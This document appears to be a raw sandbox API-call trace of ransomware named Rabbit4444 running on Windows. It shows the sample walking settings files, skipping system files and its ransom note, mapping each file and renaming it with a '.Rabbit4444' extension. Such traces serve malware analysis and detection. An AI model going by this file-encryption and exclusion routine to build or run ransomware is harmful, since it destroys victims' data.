(lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2=".") returned 1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="..") returned 1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="windows") returned -1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="boot") returned 1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.536] lstrcmpiW (lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.536] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms" | out: lpString1="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms") returned="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms" [0058.536] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.537] lstrlenW (lpString="Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms") returned 64 [0058.537] lstrlenW (lpString="Rabbit4444") returned 10 [0058.537] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.537] lstrlenW (lpString=".dll") returned 4 [0058.537] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.537] lstrlenW (lpString=".lnk") returned 4 [0058.537] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.537] lstrlenW (lpString=".ini") returned 4 [0058.537] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.537] lstrlenW (lpString=".sys") returned 4 [0058.537] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.537] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.537] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14984805217) returned 1 [0058.537] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=937) returned 1 [0058.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0058.537] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0058.540] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0058.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.541] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14985222663) returned 1 [0058.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0058.542] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.542] CloseHandle (hObject=0x298) returned 1 [0058.542] CloseHandle (hObject=0x278) returned 1 [0058.542] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms.Rabbit4444") returned 192 [0058.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{36fb1658-3a23-4d62-9bfd-37f4b18a85e9}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.543] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ad4aba3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4ad4aba3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", cAlternateFileName="CL96B1~1.SET")) returned 1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2=".") returned 1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="..") returned 1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="windows") returned -1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="boot") returned 1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.543] lstrcmpiW (lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.543] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms" | out: lpString1="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms") returned="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms" [0058.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.543] lstrlenW (lpString="Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms") returned 64 [0058.543] lstrlenW (lpString="Rabbit4444") returned 10 [0058.543] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.543] lstrlenW (lpString=".dll") returned 4 [0058.543] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.543] lstrlenW (lpString=".lnk") returned 4 [0058.543] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.543] lstrlenW (lpString=".ini") returned 4 [0058.543] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.544] lstrlenW (lpString=".sys") returned 4 [0058.544] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.544] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37092408-d49c-451d-b56d-78b243dc475c}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.544] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.544] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14985462433) returned 1 [0058.544] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=956) returned 1 [0058.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0058.544] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0058.545] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0058.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0058.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.546] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14985714440) returned 1 [0058.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0058.547] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.547] CloseHandle (hObject=0x298) returned 1 [0058.547] CloseHandle (hObject=0x278) returned 1 [0058.547] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms.Rabbit4444") returned 192 [0058.547] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37092408-d49c-451d-b56d-78b243dc475c}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37092408-D49C-451D-B56D-78B243DC475C}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37092408-d49c-451d-b56d-78b243dc475c}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.548] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b5ef448, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4b5ef448, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2230fb7c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", cAlternateFileName="CLE328~1.SET")) returned 1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2=".") returned 1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="..") returned 1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="windows") returned -1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="boot") returned 1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.548] lstrcmpiW (lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.548] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms" | out: lpString1="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms") returned="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms" [0058.548] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.549] lstrlenW (lpString="Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms") returned 64 [0058.549] lstrlenW (lpString="Rabbit4444") returned 10 [0058.549] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.549] lstrlenW (lpString=".dll") returned 4 [0058.549] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.549] lstrlenW (lpString=".lnk") returned 4 [0058.549] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.549] lstrlenW (lpString=".ini") returned 4 [0058.549] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.549] lstrlenW (lpString=".sys") returned 4 [0058.549] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37c361d8-51cd-40fa-a797-8fc1ea28f9f4}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.549] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.549] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14986010339) returned 1 [0058.549] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=946) returned 1 [0058.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0058.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0058.550] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0058.552] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0058.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.553] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14986422337) returned 1 [0058.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0058.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0058.554] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.554] CloseHandle (hObject=0x298) returned 1 [0058.554] CloseHandle (hObject=0x278) returned 1 [0058.554] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms.Rabbit4444") returned 192 [0058.554] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37c361d8-51cd-40fa-a797-8fc1ea28f9f4}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37C361D8-51CD-40fa-A797-8FC1EA28F9F4}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37c361d8-51cd-40fa-a797-8fc1ea28f9f4}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.555] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf06406, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4bf06406, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x406, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", cAlternateFileName="CL8E90~1.SET")) returned 1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2=".") returned 1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="..") returned 1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="windows") returned -1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="boot") returned 1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.555] lstrcmpiW (lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.555] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms" | out: lpString1="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms") returned="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms" [0058.555] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.555] lstrlenW (lpString="Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms") returned 64 [0058.555] lstrlenW (lpString="Rabbit4444") returned 10 [0058.555] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.555] lstrlenW (lpString=".dll") returned 4 [0058.555] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.555] lstrlenW (lpString=".lnk") returned 4 [0058.555] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.555] lstrlenW (lpString=".ini") returned 4 [0058.555] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.555] lstrlenW (lpString=".sys") returned 4 [0058.555] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{37E2F32E-C821-4094-B429-2B4E8EA810AA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{37e2f32e-c821-4094-b429-2b4e8ea810aa}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.556] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.556] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14986650163) returned 1 [0058.556] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1030) returned 1 [0058.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0058.556] RtlAllocateHeap 